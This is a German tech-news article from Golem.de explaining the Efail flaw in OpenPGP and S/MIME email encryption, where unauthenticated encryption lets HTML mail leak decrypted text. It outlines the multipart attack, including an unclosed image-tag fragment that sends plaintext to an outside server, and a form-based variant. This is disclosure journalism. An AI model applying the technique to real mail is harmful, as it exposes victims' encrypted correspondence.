• IT-Karriere:
  • Services:

PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen

Ein Zusammenspiel von veralteten Verschlüsselungsmethoden und HTML-Mails erlaubt es in vielen Fällen, mit OpenPGP oder S/MIME verschlüsselte Nachrichten zu exfiltrieren. Bislang gibt es keine echten Fixes und nur unzureichende Workarounds.

Artikel von Hanno Böck veröffentlicht am
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter.
Ouch ... die Mailverschlüsselungsstandards S/MIME und OpenPGP nutzen uralte Verschlüsselungsverfahren - und das rächt sich jetzt bitter. (Bild: Jana Runde/Zuzana Somorovska)

Ein Forscherteam hat eine ganze Reihe von Problemen bei der Verwendung verschlüsselter E-Mails entdeckt. Die Efail getaufte Lücke betrifft beide standardisierten E-Mail-Verschlüsselungsverfahren - OpenPGP und S/MIME - und lässt sich in zahlreichen E-Mail-Clients ausnutzen.

Inhalt:
  1. PGP/SMIME: Angreifer können sich entschlüsselte E-Mails schicken lassen
  2. Verschlüsselung nicht authentifiziert
  3. Workarounds, Updates, Gegenmaßnahmen

Das Grundproblem: Verschlüsselung ohne Authentifizierung. S/MIME nutzt einen völlig unauthentifizierten Verschlüsselungsmodus, in OpenPGP ist zwar theoretisch eine Authentifizierung vorgesehen, die ist aber in der Praxis oft nutzlos.

Die Angriffe nutzen HTML-Mails, um entschlüsselte Daten an den Server des Angreifers zu schicken. Dabei wird eine bestehende E-Mail so umgestaltet, dass der HTML-Code eine Anfrage zu einem Server auslöst und dabei den entschlüsselten Text der Mail mitschickt.

Angriff über Multipart-Mails

Bereits daraus lässt sich in manchen Fällen ein Angriff konstruieren. E-Mail-Nachrichten können aus mehreren Teilen bestehen, sogenannte Multipart-Messages. In manchen Mailclients - am einfachsten in Apple Mail - ist es möglich, direkt aus dem HTML-Teil einer Nachricht auf den nachfolgenden Textteil zuzugreifen.

Stellenmarkt
  1. Technische Hochschule Rosenheim, Rosenheim
  2. finanzen.de, Berlin

Ein Angreifer kann nun Folgendes machen: Er schickt als ersten Teil einer Nachricht einen HTML-Teil, der beispielsweise ein Bild lädt, aber den HTML-Tag nicht schließt. Also etwa <img src="http://efail.de/. Als zweiten Teil hängt er den verschlüsselten Teil einer Mail an, die er mitgelesen hat, etwa über einen Man-in-the-Middle-Angriff zwischen den Mailservern. Im Mailclient des Opfers passiert nun Folgendes: Ein Bild wird vom Server des Angreifers geladen und als Pfad wird der Inhalt des nachfolgenden Textteils codiert angehängt.

In Apple Mail funktioniert dieser Angriff direkt, in Mozilla Thunderbird werden in der Standardeinstellung keine Bilder geladen. Doch auch hier ist es mit Tricks möglich, eine Exfiltration der Daten zu erreichen. So kann man beispielsweise per HTML ein Formular erzeugen, das die Daten des verschlüsselten Teils an den Angreifer schickt. Da man die Mail über CSS beliebig layouten kann, kann man das auch so machen, dass ein Klick irgendwo in der Mail dazu führt, dass das Formular abgeschickt wird.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed
Verschlüsselung nicht authentifiziert 
  1. 1
  2. 2
  3. 3
  4.  


Anzeige
Hardware-Angebote

mark.wolf 22. Mai 2018

Du solltest Dich mal ein klein wenig mit dem Recht auseinandersetzen. Auch dein...

Auspuffanlage 21. Mai 2018

Hi ich interpretiere das mal so, dass du wissen willst wo es diese Informationen gibt...

joo 17. Mai 2018

-------------------------------------------------------------------------------- +1...

phade 15. Mai 2018

Zumeist Mail von der Seamonkey-Suite (ergo Thunderbird). Nur nutzt das nix, wenn das für...

Mr Miyagi 15. Mai 2018

Natürlich *kann* es das. GnuPG könnte auch ein Abbild Deiner ganzen Mailbox im Speicehr...


Folgen Sie uns
       


Ausblendbare Kamera von Oneplus - Hands on (CES 2020)

Das Concept One ist das erste Konzept-Smartphone von Oneplus - und dient dazu, die ausblendbare Kamera zu demonstrieren.

Ausblendbare Kamera von Oneplus - Hands on (CES 2020) Video aufrufen
Ryzen Mobile 4000 (Renoir): Lasst die Ära der schrottigen AMD-Notebooks enden!
Ryzen Mobile 4000 (Renoir)
Lasst die Ära der schrottigen AMD-Notebooks enden!

Seit vielen Jahren gibt es kaum Premium-Geräte mit AMD-Chips und selbst bei vermeintlich identischer Ausstattung fehlen Eigenschaften wie eine beleuchtete Tastatur oder Thunderbolt 3. Schluss damit!
Ein IMHO von Marc Sauter

  1. HEDT-Prozessor 64-kerniger Threadripper schlägt 20.000-Dollar-Xeons
  2. Ryzen Mobile 4000 AMDs Renoir hat acht 7-nm-Kerne für Ultrabooks
  3. Zen+ AMD verkauft Ryzen 5 1600 mit flotteren CPU-Kernen

Film: Wie sich Science-Fiction-Autoren das Jahr 2020 vorstellten
Film
Wie sich Science-Fiction-Autoren das Jahr 2020 vorstellten

Drachen löschen die Menschheit fast aus, Aliens löschen die Menschheit fast aus, Monster löschen die Menschheit fast aus: Das Jahr 2020 ist in Spielfilmen nicht gerade heiter.
Von Peter Osteried

  1. Alien Im Weltall hört dich keiner schreien
  2. Terminator: Dark Fate Die einzig wahre Fortsetzung eines Klassikers?
  3. Gemini Man Überflüssiges Klonexperiment

Holo-Monitor angeschaut: Looking Glass' 8K-Monitor erzeugt Holo-Bild
Holo-Monitor angeschaut
Looking Glass' 8K-Monitor erzeugt Holo-Bild

CES 2020 Mit seinem neuen 8K-Monitor hat Looking Glass Factory eine Möglichkeit geschaffen, ohne zusätzliche Hardware 3D-Material zu betrachten. Die holographische Projektion wird in einem Glaskubus erzeugt und sieht beeindruckend realistisch aus.
Von Tobias Költzsch und Martin Wolf

  1. UHD Alliance Fernseher mit Filmmaker-Modus kommen noch 2020
  2. Alienware Concept Ufo im Hands on Die Switch für Erwachsene
  3. Galaxy Home Mini Samsung schraubt Erwartungen an Bixby herunter

    •  /